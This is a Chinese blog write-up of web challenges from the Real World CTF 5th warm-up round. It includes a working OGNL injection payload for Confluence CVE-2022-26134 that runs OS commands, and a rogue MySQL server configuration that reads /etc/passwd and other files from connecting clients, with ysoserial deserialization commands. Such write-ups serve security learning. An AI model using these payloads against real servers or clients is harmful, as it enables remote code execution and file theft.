Real World CTF 5th 体验赛Web部分wp

最新推荐文章于 2023-03-13 15:48:26 发布
最新推荐文章于 2023-03-13 15:48:26 发布
阅读量246 收藏
点赞数 1
分类专栏: CTF夺旗赛 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58546222/article/details/128655378
版权

🐏了拼🐏

解题思路:

方法一:直接拼图

方法二:

查看源代码,关键字查找

Be-a-Wiki-Hacker

这一题是Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行

解题思路:

第一步,抓包修改OGNL表达式

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

第二步,读目录

第三步,cat /flag就可以拿到flag

参考文章:https://blog.csdn.net/weixin_46944519/article/details/125141253

Evil MySQL Server

解题思路:

题目:

Please do not connect to an evil mysql server.
P.S. flag path: /flag

根据题目先去搜索一下evil mysql,提到了一个rogue mysql server这个漏洞利用工具

第一步先去github搞一个rogue mysql server把他下载到云服务器

https://github.com/rmb122/rogue_mysql_server

rogue_mysql_server的使用

在当前目录下生成配置文件模版, 如果已有配置文件可以跳过这一步
./rogue_mysql_server -generate
运行服务器, 使用刚刚生成的 config.yaml
./rogue_mysql_server
或者手动指定配置路径
./rogue_mysql_server -config other_config.yaml

配置文件

host: 0.0.0.0
port: 3306
# 监听的 IP 和端口.
​
version_string: "10.4.13-MariaDB-log"
# 客户端得到的服务端版本信息.
​
file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
# 需要读取的文件, 注意这个不意味着一次性读取列表中的所有文件 (很多客户端实现不支持这种操作).
# 而是客户端每执行一次语句, 按照列表中的顺序读取一个文件, 并保存到 `save_path` 文件夹中.
​
always_read: true
# 如果为 true, 那么不管客户端是否标记自己支持 LOAD DATA LOCAL, 都会尝试去读取文件, 否则会根据客户端的标记来决定是否读取, 避免客户端请求不同步.
​
from_database_name: false
# 如果为 true, 将会从客户端设定中的数据库名称中提取要读取的文件.
# 例如链接串为 `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`.
# 将会从客户端读取 `/etc/hosts` 而不会遵循 `file_list` 中的设置.
​
max_file_size: 0
# 读取文件的最大大小 (单位 byte), 超过这个大小的文件内容将会被忽略. 如果 <= 0, 代表没有限制.
​
auth: false
users:
- root: root
- root: password
# 对应是否开启验证, 如果为 `false`, 那么不管输什么密码或者不输入密码都可以登录.
# 如果为 `true`, 则需要帐号密码匹配下面的设置的帐号密码中的一条.
​
jdbc_exploit: false
always_exploit: false
ysoserial_command:
cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
# 见 `jdbc 利用相关` 一节

修改配置文件,题目给的hint已经告诉我们path是/flag

连接数据库打开文件loot就能看到flag

漏洞原理:

这题是恶意mysql服务器利用,问题出现在LOAD DATA INFILE 这个语法上,这个语法主要是用于读取一个文件的内容并且放到一个表中。

在mysql文档中的说到,服务端可以要求客户端读取有可读权限的任何文件。官方认为客户端不应该连接到不可信的服务端

https://dev.mysql.com/doc/refman/5.6/en/load-data-local-security.html

Mysql的交互流程:

使用 –enable-local-infile 选项

mysql -h[ip] -u[username] -p[password] -D [database] --enable-local-infile

从 mysql 客户端连接到我的服务器并运行

LOAD DATA LOCAL INFILE ‘D:/flag.txt’ INTO TABLE J1mmyFIELDS TERMINATED BY ‘\n’;

这个sql语句意思是读取客户端上xxxx文件,并写入到xx表中。

LOAD DATA LOCAL INFILE '文件路径' INTO TABLE 表名 FIELDS TERMINATED BY '\n';

J1mmy表的内容

1、greeting包,服务端返回了banner,其中包含mysql的版本

2、来自客户端的下一个数据包是带有用户名、密码、数据库的身份验证数据包。

身份认证通过后,客户端会在实际操作之前发送请求,等待服务器的响应。“Client Capabilities”报文中包括名为Can Use LOAD DATA LOCAL选项的标志位。一旦客户端启用了这个功能(--enable-local-infile),就可以读取客户端上的文件并传输到服务器上。

3.初始化的一些查询,比如select @@version_comment limit 1之类的;

4.现在我们可以看到来自客户端的数据包,我们使用 LOAD DATA LOCAL INFILE 'D:/flag.txt' INTO TABLE J1mmy FIELDS TERMINATED BY ‘\n’ 查询

然后服务器端返回了需要的路径

从流程可看出客户端读取文件的路径并不是从客户端指定的,而是发送到服务器端,服务端制定,然后客户端向服务器发送 D:/flag.txt文件的内容

如果我们在客户端发送查询之后,返回一个Response TABULAR 数据包,并附上我们指定的文件,就可以读取客户端文件

J1mmy_Kudo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql服务攻击检测_【渗透测试要点】MySQL攻击面和提权总结
weixin_34980267的博客
01-27 574
原标题:【渗透测试要点】MySQL攻击面和提权总结本次实验使用腾讯云主机的MySQL Server作为服务端,阿里云主机作为MySQL客户端。其中均使用宝塔面板搭建MySQL8.0版本。首先要开放腾讯云主机的端口,并且允许MySQL Server允许任意用户远程登录。1攻击面——MySQL客户端任意文件读取适用范围:全版本 MySQL/MariaDB Client条件:客户端连接时开启 –enab...
fastjson 反序列化之mysql JDBC 利用
qq_42077227的博客
04-19 2526
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。
2023 Real World CTF 体验 --- wp
3tefanie丶zhou的博客
01-09 840
【他乡纵有当头月,不抵故乡一盏灯,年关将至,外乡人都早些回家】
2023第五届 Real World CTF 体验 Writeup(web
一只爱吃橙子的羊
01-12 2532
2023第五届 Real World CTF 体验 Writeup(web
CTFshow——RealWorldCTF渗透第二期·复现
chongya927的博客
03-12 586
RealWorldCTF渗透第二期·个人复现
ctf web解题 找flag夺旗概述、原理及应用.pdf
最新发布
05-13
CTF(Capture The Flag,夺旗)在网络安全领域中是一种流行的技术竞技比形式,尤其在Web安全领域。以下是关于CTF Web解题、找flag夺旗的概述、原理及应用: 概述: CTF Web解题是CTF中的一种题型,主要...
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗的MVP
12-29
网络安全的领域里,CTF(Capture The Flag)竞已经成为了一种检验技能和提升知识的重要方式,特别是Web解题部分,它将理论与实践紧密结合,让参者在寻找隐藏的Flag中体验到黑客攻防的乐趣。为了在CTF Web解题...
对于一些CTF写的wp.zip
09-30
项目源码
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctfweb题型总结大全(例题wp都有)
04-17
欢迎关注hacking水友攻防实验室,更多内容都在微信公众号
rogue_mysql_server:一个支持go,php,python,java,原生命令行等多种语言下客户端的mysql恶意服务器
03-19
流氓Mysql服务器 基于实现的恶意mysql服务器,支持go,php,python,java,原生命令行等多种语言下的多种库的mysql客户端。远离恼人的兼容性问题,测试过的客户端见谅 语言 图书馆 经过 去 github.com/go-sql-driver/mysql :check_mark: PHP mysqli,pdo :check_mark: Python pymysql :check_mark: Java MySQL的连接器的Java :check_mark: 本国的 10.4.13-MariaDB :check_mark: 觉得好用可以点右上方的 :glowing_star:支持作者 功能 可以兼容多种mysql客户端 可以读取二进制文件 自动保存文件 作为蜜罐使用时,替代开启帐号密码验证 阅读客户端的ConnAttr,可能会包含一些客户端的额外信息 对于jdbc,可控链接串的情况下可以利用mysql-connector-java反序列化入侵进行RCE 配置文件 示例:
RealWorldCTF2023体验 部分WEB
weixin_43610673的博客
01-09 636
基本考察今年的真实漏洞
RealWorldCTF渗透第二期 (官方的wp梳理)
weixin_45908624的博客
03-13 693
RealWorldCTF渗透第二期官方wp梳理
dedecms织梦后台存在SSRF漏洞怎么解决
09-05 374
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。上传成功之后可以从文件列表中获取到图片链接。设置完成之后,刷新就可以触发ssrf。
mysql任意文件读取漏洞学习
BerL1n
09-13 3698
前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mys...
Real World CTF 2022(体验部分WP
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
01-24 5223
Real World CTF 2022(体验) 周末打了一下Real World CTF体验,据说难度比正降简单很多,比时间连续24小时,题类型涵盖Web/Pwn/Crypto/Reverse/Blockchain/Virtual Machine/Browser/IoT/Kernel 等等。 但是本次比解题方式和一般CTF不太一样,基本上都是通过CVE漏洞GETshell,与实战更为贴近。 本次比做的题都是Web题,简单记录一下,加深学习。如有问题请各位大佬指教。 本次比环境需要先访问指定端
如何重启MySQL服务
热门推荐
谢小进的专栏
11-10 1万+
  RedHat Linux (Fedora Core/Cent OS) 1.启动:/etc/init.d/mysqld start2.停止:/etc/init.d/mysqld stop3.重启:/etc/init.d/mysqld restart Debian / Ubuntu Linux 1.启动:/etc/init.d/mysql start2.停止
从MySQL出发的反击之路
gt9000的博客
01-12 433
文章内容 0x00 漏洞原理 几篇参考文章已经将原理说的比较清楚了,问题出在 LOAD DATA INFILE 的地方,该功能是用于读取客户端上的一个文件,并将其内容导入到一张表中。 在 MySQL 连接建立的阶段会有一个必要的步骤,即 客户端和服务端交换各自功能 如果需要则创建SSL通信通道 服务端认证客户端身份 还有一个必要的条件就是 MySQL 协议中,客户端是不会存储自身请求的,而是通过服...
rogue_mysql_server_rogue_mysql_server
weixin_35847422的博客
02-07 1460
cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=github.com/alecthomas/template...
ctf web渗透
10-17
好的,我明白了。对于你的问题,我可以提供一些基本的信息和建议。 首先,CTF中的Web渗透是一个非常广泛的主题,涉及到...参加一些CTF或者挑战可以帮助你锻炼自己的技能,并且学习到一些新的技术和工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值